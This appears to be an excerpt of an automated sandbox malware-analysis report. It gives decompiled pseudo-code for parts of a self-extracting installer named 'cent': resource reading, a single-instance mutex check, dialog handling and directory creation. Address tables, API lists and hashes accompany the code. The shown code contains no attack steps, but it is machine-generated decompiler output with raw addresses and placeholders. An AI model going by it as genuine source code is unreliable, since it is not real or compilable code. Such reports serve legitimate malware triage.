                                                                                                                                                                                                      						__eflags = _t49 - 0xa691e5 - 3;
                                                                                                                                                                                                      						if(_t49 - 0xa691e5 < 3) {
                                                                                                                                                                                                      							goto L32;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t24 =  *0xa691e5; // 0x3a
                                                                                                                                                                                                      						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                      						if(_t24 == 0x3a) {
                                                                                                                                                                                                      							L21:
                                                                                                                                                                                                      							_t25 = GetFileAttributesA(0xa691e4);
                                                                                                                                                                                                      							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                      							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                      								L26:
                                                                                                                                                                                                      								E00A6658A(0xa691e4, 0x104, 0xa61140);
                                                                                                                                                                                                      								_t27 = E00A658C8(0xa691e4);
                                                                                                                                                                                                      								__eflags = _t27;
                                                                                                                                                                                                      								if(_t27 != 0) {
                                                                                                                                                                                                      									__eflags =  *0xa691e4 - 0x5c;
                                                                                                                                                                                                      									if( *0xa691e4 != 0x5c) {
                                                                                                                                                                                                      										L30:
                                                                                                                                                                                                      										_t30 = E00A6597D(0xa691e4, 1, _t64, 1);
                                                                                                                                                                                                      										__eflags = _t30;
                                                                                                                                                                                                      										if(_t30 == 0) {
                                                                                                                                                                                                      											L35:
                                                                                                                                                                                                      											_t42 = 1;
                                                                                                                                                                                                      											__eflags = 1;
                                                                                                                                                                                                      											goto L36;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										L31:
                                                                                                                                                                                                      										_t42 = 1;
                                                                                                                                                                                                      										EndDialog(_t64, 1);
                                                                                                                                                                                                      										goto L36;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									__eflags =  *0xa691e5 - 0x5c;
                                                                                                                                                                                                      									if( *0xa691e5 == 0x5c) {
                                                                                                                                                                                                      										goto L31;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L30;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_push(0x10);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_t58 = 0x4be;
                                                                                                                                                                                                      								goto L25;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t32 = E00A644B9(_t64, 0x54a, 0xa691e4, 0, 0x20, 4);
                                                                                                                                                                                                      							__eflags = _t32 - 6;
                                                                                                                                                                                                      							if(_t32 != 6) {
                                                                                                                                                                                                      								goto L35;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t33 = CreateDirectoryA(0xa691e4, 0);
                                                                                                                                                                                                      							__eflags = _t33;
                                                                                                                                                                                                      							if(_t33 != 0) {
                                                                                                                                                                                                      								goto L26;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							_push(0x10);
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							_push(0xa691e4);
                                                                                                                                                                                                      							_t58 = 0x4cb;
                                                                                                                                                                                                      							goto L25;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags =  *0xa691e4 - 0x5c;
                                                                                                                                                                                                      						if( *0xa691e4 != 0x5c) {
                                                                                                                                                                                                      							goto L32;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                      						if(_t24 != 0x5c) {
                                                                                                                                                                                                      							goto L32;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L21;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t34 = _t20 - 1;
                                                                                                                                                                                                      					__eflags = _t34;
                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                      						EndDialog(_t64, 0);
                                                                                                                                                                                                      						 *0xa69124 = 0x800704c7;
                                                                                                                                                                                                      						goto L39;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__eflags = _t34 != 0x834;
                                                                                                                                                                                                      					if(_t34 != 0x834) {
                                                                                                                                                                                                      						goto L36;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t37 = LoadStringA( *0xa69a3c, 0x3e8, 0xa68598, 0x200);
                                                                                                                                                                                                      					__eflags = _t37;
                                                                                                                                                                                                      					if(_t37 != 0) {
                                                                                                                                                                                                      						_t38 = E00A64224(_t64, _t46, _t46);
                                                                                                                                                                                                      						__eflags = _t38;
                                                                                                                                                                                                      						if(_t38 == 0) {
                                                                                                                                                                                                      							goto L36;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t39 = SetDlgItemTextA(_t64, 0x835, 0xa687a0);
                                                                                                                                                                                                      						__eflags = _t39;
                                                                                                                                                                                                      						if(_t39 != 0) {
                                                                                                                                                                                                      							goto L36;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t63 = 0x4c0;
                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                      						E00A644B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						goto L38;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t63 = 0x4b1;
                                                                                                                                                                                                      					goto L9;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}
                                                                                                                                                                                                      0x00a632fc
                                                                                                                                                                                                      0x00a63301
                                                                                                                                                                                                      0x00a63301
                                                                                                                                                                                                      0x00a63303
                                                                                                                                                                                                      0x00a63304
                                                                                                                                                                                                      0x00a63304
                                                                                                                                                                                                      0x00a6330a
                                                                                                                                                                                                      0x00a6330d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63313
                                                                                                                                                                                                      0x00a63318
                                                                                                                                                                                                      0x00a6331a
                                                                                                                                                                                                      0x00a63331
                                                                                                                                                                                                      0x00a63332
                                                                                                                                                                                                      0x00a6333a
                                                                                                                                                                                                      0x00a6333d
                                                                                                                                                                                                      0x00a6337c
                                                                                                                                                                                                      0x00a63388
                                                                                                                                                                                                      0x00a6338f
                                                                                                                                                                                                      0x00a63394
                                                                                                                                                                                                      0x00a63396
                                                                                                                                                                                                      0x00a633a4
                                                                                                                                                                                                      0x00a633ab
                                                                                                                                                                                                      0x00a633b6
                                                                                                                                                                                                      0x00a633be
                                                                                                                                                                                                      0x00a633c3
                                                                                                                                                                                                      0x00a633c5
                                                                                                                                                                                                      0x00a63435
                                                                                                                                                                                                      0x00a63437
                                                                                                                                                                                                      0x00a63437
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63437
                                                                                                                                                                                                      0x00a633c7
                                                                                                                                                                                                      0x00a633c9
                                                                                                                                                                                                      0x00a633cc
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a633cc
                                                                                                                                                                                                      0x00a633ad
                                                                                                                                                                                                      0x00a633b4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a633b4
                                                                                                                                                                                                      0x00a63398
                                                                                                                                                                                                      0x00a63399
                                                                                                                                                                                                      0x00a6339b
                                                                                                                                                                                                      0x00a6339c
                                                                                                                                                                                                      0x00a6339d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6339d
                                                                                                                                                                                                      0x00a6334c
                                                                                                                                                                                                      0x00a63351
                                                                                                                                                                                                      0x00a63354
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6335c
                                                                                                                                                                                                      0x00a63362
                                                                                                                                                                                                      0x00a63364
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63366
                                                                                                                                                                                                      0x00a63367
                                                                                                                                                                                                      0x00a63369
                                                                                                                                                                                                      0x00a6336a
                                                                                                                                                                                                      0x00a6336b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6336b
                                                                                                                                                                                                      0x00a6331c
                                                                                                                                                                                                      0x00a63323
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63329
                                                                                                                                                                                                      0x00a6332b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6332b
                                                                                                                                                                                                      0x00a6324c
                                                                                                                                                                                                      0x00a6324c
                                                                                                                                                                                                      0x00a6324f
                                                                                                                                                                                                      0x00a632c8
                                                                                                                                                                                                      0x00a632ce
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a632ce
                                                                                                                                                                                                      0x00a63251
                                                                                                                                                                                                      0x00a63256
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63271
                                                                                                                                                                                                      0x00a63277
                                                                                                                                                                                                      0x00a63279
                                                                                                                                                                                                      0x00a63298
                                                                                                                                                                                                      0x00a6329d
                                                                                                                                                                                                      0x00a6329f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a632b0
                                                                                                                                                                                                      0x00a632b6
                                                                                                                                                                                                      0x00a632b8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a632be
                                                                                                                                                                                                      0x00a63280
                                                                                                                                                                                                      0x00a63289
                                                                                                                                                                                                      0x00a6328e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6328e
                                                                                                                                                                                                      0x00a6327b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6327b
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadStringA.USER32(000003E8,00A68598,00000200), ref: 00A63271
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00A633E2
                                                                                                                                                                                                      • SetWindowTextA.USER32(?,cent), ref: 00A633F7
                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00A63410
                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000836), ref: 00A63426
                                                                                                                                                                                                      • EnableWindow.USER32(00000000), ref: 00A6342D
                                                                                                                                                                                                      • EndDialog.USER32(?,00000000), ref: 00A6343F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$cent
                                                                                                                                                                                                      • API String ID: 2418873061-3876674994
                                                                                                                                                                                                      • Opcode ID: b05857d7997d81c85310a49366e9758a767f496cd6a5a73f3ddaf66cc9654ba8
                                                                                                                                                                                                      • Instruction ID: 42ca276c51b19e9d87b05ba31425fe8309afb712e7ce1f9d225d9b577aa1d280
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b05857d7997d81c85310a49366e9758a767f496cd6a5a73f3ddaf66cc9654ba8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB51383238024077FF219B755C8DFBB697CEB66B55F104228F206EA2D1CEF48A039661
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E00A62CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t13;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                      				struct HRSRC__* _t31;
                                                                                                                                                                                                      				intOrPtr _t33;
                                                                                                                                                                                                      				void* _t43;
                                                                                                                                                                                                      				void* _t48;
                                                                                                                                                                                                      				signed int _t65;
                                                                                                                                                                                                      				struct HINSTANCE__* _t66;
                                                                                                                                                                                                      				signed int _t67;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t13 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                      				_t65 = 0;
                                                                                                                                                                                                      				_t66 = __ecx;
                                                                                                                                                                                                      				_t48 = __edx;
                                                                                                                                                                                                      				 *0xa69a3c = __ecx;
                                                                                                                                                                                                      				memset(0xa69140, 0, 0x8fc);
                                                                                                                                                                                                      				memset(0xa68a20, 0, 0x32c);
                                                                                                                                                                                                      				memset(0xa688c0, 0, 0x104);
                                                                                                                                                                                                      				 *0xa693ec = 1;
                                                                                                                                                                                                      				_t20 = E00A6468F("TITLE", 0xa69154, 0x7f);
                                                                                                                                                                                                      				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                      					_t64 = 0x4b1;
                                                                                                                                                                                                      					goto L32;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                      					 *0xa6858c = _t27;
                                                                                                                                                                                                      					SetEvent(_t27);
                                                                                                                                                                                                      					_t64 = 0xa69a34;
                                                                                                                                                                                                      					if(E00A6468F("EXTRACTOPT", 0xa69a34, 4) != 0) {
                                                                                                                                                                                                      						if(( *0xa69a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                      							L12:
                                                                                                                                                                                                      							 *0xa69120 =  *0xa69120 & _t65;
                                                                                                                                                                                                      							if(E00A65C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                      								if( *0xa68a3a == 0) {
                                                                                                                                                                                                      									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                      									if(_t31 != 0) {
                                                                                                                                                                                                      										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									if( *0xa68184 != 0) {
                                                                                                                                                                                                      										__imp__#17();
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									if( *0xa68a24 == 0) {
                                                                                                                                                                                                      										_t57 = _t65;
                                                                                                                                                                                                      										if(E00A636EE(_t65) == 0) {
                                                                                                                                                                                                      											goto L33;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t33 =  *0xa69a40; // 0x3
                                                                                                                                                                                                      											_t48 = 1;
                                                                                                                                                                                                      											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                      												if(( *0xa69a34 & 0x00000100) == 0 || ( *0xa68a38 & 0x00000001) != 0 || E00A618A3(_t64, _t66) != 0) {
                                                                                                                                                                                                      													goto L30;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_t64 = 0x7d6;
                                                                                                                                                                                                      													if(E00A66517(_t57, 0x7d6, _t34, E00A619E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                      														goto L33;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														goto L30;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												L30:
                                                                                                                                                                                                      												_t23 = _t48;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t23 = 1;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									E00A62390(0xa68a3a);
                                                                                                                                                                                                      									goto L33;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t64 = 0x520;
                                                                                                                                                                                                      								L32:
                                                                                                                                                                                                      								E00A644B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                      								goto L33;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t64 =  &_v268;
                                                                                                                                                                                                      							if(E00A6468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                      								goto L3;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                      								 *0xa68588 = _t43;
                                                                                                                                                                                                      								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                      									goto L12;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									if(( *0xa69a34 & 0x00000080) == 0) {
                                                                                                                                                                                                      										_t64 = 0x524;
                                                                                                                                                                                                      										if(E00A644B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                      											goto L12;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											goto L11;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t64 = 0x54b;
                                                                                                                                                                                                      										E00A644B9(0, 0x54b, "cent", 0, 0x10, 0);
                                                                                                                                                                                                      										L11:
                                                                                                                                                                                                      										CloseHandle( *0xa68588);
                                                                                                                                                                                                      										 *0xa69124 = 0x800700b7;
                                                                                                                                                                                                      										goto L33;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						L3:
                                                                                                                                                                                                      						_t64 = 0x4b1;
                                                                                                                                                                                                      						E00A644B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						 *0xa69124 = 0x80070714;
                                                                                                                                                                                                      						L33:
                                                                                                                                                                                                      						_t23 = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00A66CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                      			}



















                                                                                                                                                                                                      0x00a62e6c
                                                                                                                                                                                                      0x00a62e6c
                                                                                                                                                                                                      0x00a62e75
                                                                                                                                                                                                      0x00a62e77
                                                                                                                                                                                                      0x00a62e77
                                                                                                                                                                                                      0x00a62e84
                                                                                                                                                                                                      0x00a62e8b
                                                                                                                                                                                                      0x00a62e94
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62e96
                                                                                                                                                                                                      0x00a62e96
                                                                                                                                                                                                      0x00a62e9e
                                                                                                                                                                                                      0x00a62ea2
                                                                                                                                                                                                      0x00a62eba
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62ece
                                                                                                                                                                                                      0x00a62ede
                                                                                                                                                                                                      0x00a62eed
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62eed
                                                                                                                                                                                                      0x00a62eef
                                                                                                                                                                                                      0x00a62eef
                                                                                                                                                                                                      0x00a62eef
                                                                                                                                                                                                      0x00a62eef
                                                                                                                                                                                                      0x00a62ea2
                                                                                                                                                                                                      0x00a62e86
                                                                                                                                                                                                      0x00a62e88
                                                                                                                                                                                                      0x00a62e88
                                                                                                                                                                                                      0x00a62e43
                                                                                                                                                                                                      0x00a62e48
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62e48
                                                                                                                                                                                                      0x00a62e30
                                                                                                                                                                                                      0x00a62e30
                                                                                                                                                                                                      0x00a62ef8
                                                                                                                                                                                                      0x00a62f01
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62f01
                                                                                                                                                                                                      0x00a62d8a
                                                                                                                                                                                                      0x00a62d8f
                                                                                                                                                                                                      0x00a62da1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62da3
                                                                                                                                                                                                      0x00a62dae
                                                                                                                                                                                                      0x00a62db4
                                                                                                                                                                                                      0x00a62dbb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62dca
                                                                                                                                                                                                      0x00a62dd3
                                                                                                                                                                                                      0x00a62df5
                                                                                                                                                                                                      0x00a62e02
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62dd5
                                                                                                                                                                                                      0x00a62dde
                                                                                                                                                                                                      0x00a62de3
                                                                                                                                                                                                      0x00a62e04
                                                                                                                                                                                                      0x00a62e0a
                                                                                                                                                                                                      0x00a62e10
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62e10
                                                                                                                                                                                                      0x00a62dd3
                                                                                                                                                                                                      0x00a62dbb
                                                                                                                                                                                                      0x00a62da1
                                                                                                                                                                                                      0x00a62d5b
                                                                                                                                                                                                      0x00a62d5b
                                                                                                                                                                                                      0x00a62d5d
                                                                                                                                                                                                      0x00a62d69
                                                                                                                                                                                                      0x00a62d6e
                                                                                                                                                                                                      0x00a62f06
                                                                                                                                                                                                      0x00a62f06
                                                                                                                                                                                                      0x00a62f06
                                                                                                                                                                                                      0x00a62d59
                                                                                                                                                                                                      0x00a62f18

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.MSVCRT ref: 00A62CD9
                                                                                                                                                                                                      • memset.MSVCRT ref: 00A62CE9
                                                                                                                                                                                                      • memset.MSVCRT ref: 00A62CF9
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A646A0
                                                                                                                                                                                                        • Part of subcall function 00A6468F: SizeofResource.KERNEL32(00000000,00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646A9
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A646C3
                                                                                                                                                                                                        • Part of subcall function 00A6468F: LoadResource.KERNEL32(00000000,00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646CC
                                                                                                                                                                                                        • Part of subcall function 00A6468F: LockResource.KERNEL32(00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646D3
                                                                                                                                                                                                        • Part of subcall function 00A6468F: memcpy_s.MSVCRT ref: 00A646E5
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646EF
                                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A62D34
                                                                                                                                                                                                      • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00A62D40
                                                                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00A62DAE
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00A62DBD
                                                                                                                                                                                                      • CloseHandle.KERNEL32(cent,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00A62E0A
                                                                                                                                                                                                        • Part of subcall function 00A644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A64518
                                                                                                                                                                                                        • Part of subcall function 00A644B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A64554
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                      • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$cent
                                                                                                                                                                                                      • API String ID: 1002816675-2654900392
                                                                                                                                                                                                      • Opcode ID: 7c709e1d57dd79ca081a621a88a49f5d9873eb2d427e4d927dc33fdaf66cb52a
                                                                                                                                                                                                      • Instruction ID: e3d46be0c62d61c6bce36581f94cd837dfaf68d05d14644f6f2b521af0352a8d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c709e1d57dd79ca081a621a88a49f5d9873eb2d427e4d927dc33fdaf66cb52a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC51E5B0340701ABE760E7B09D5AB7B2ABDEB65740F144539F942D61D1DBF98C82CB21
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 81%
                                                                                                                                                                                                      			E00A634F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                      				void* _t13;
                                                                                                                                                                                                      				void* _t17;
                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                      				void* _t25;
                                                                                                                                                                                                      				struct HWND__* _t35;
                                                                                                                                                                                                      				struct HWND__* _t38;
                                                                                                                                                                                                      				void* _t39;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t9 = _a8 - 0x10;
                                                                                                                                                                                                      				if(_t9 == 0) {
                                                                                                                                                                                                      					__eflags = 1;
                                                                                                                                                                                                      					L19:
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					 *0xa691d8 = 1;
                                                                                                                                                                                                      					L20:
                                                                                                                                                                                                      					_push(_a4);
                                                                                                                                                                                                      					L21:
                                                                                                                                                                                                      					EndDialog();
                                                                                                                                                                                                      					L22:
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push(1);
                                                                                                                                                                                                      				_pop(1);
                                                                                                                                                                                                      				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                      				if(_t12 == 0) {
                                                                                                                                                                                                      					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                      					if(_a12 != 0x1b) {
                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L19;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t13 = _t12 - 0xe;
                                                                                                                                                                                                      				if(_t13 == 0) {
                                                                                                                                                                                                      					_t35 = _a4;
                                                                                                                                                                                                      					 *0xa68584 = _t35;
                                                                                                                                                                                                      					E00A643D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                      					__eflags =  *0xa68184; // 0x1
                                                                                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                                                                                      						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                      						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					SetWindowTextA(_t35, "cent");
                                                                                                                                                                                                      					_t17 = CreateThread(0, 0, E00A64FE0, 0, 0, 0xa68798);
                                                                                                                                                                                                      					 *0xa6879c = _t17;
                                                                                                                                                                                                      					__eflags = _t17;
                                                                                                                                                                                                      					if(_t17 != 0) {
                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						E00A644B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						_push(_t35);
                                                                                                                                                                                                      						goto L21;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t23 = _t13 - 1;
                                                                                                                                                                                                      				if(_t23 == 0) {
                                                                                                                                                                                                      					__eflags = _a12 - 2;
                                                                                                                                                                                                      					if(_a12 != 2) {
                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					ResetEvent( *0xa6858c);
                                                                                                                                                                                                      					_t38 =  *0xa68584; // 0x0
                                                                                                                                                                                                      					_t25 = E00A644B9(_t38, 0x4b2, 0xa61140, 0, 0x20, 4);
                                                                                                                                                                                                      					__eflags = _t25 - 6;
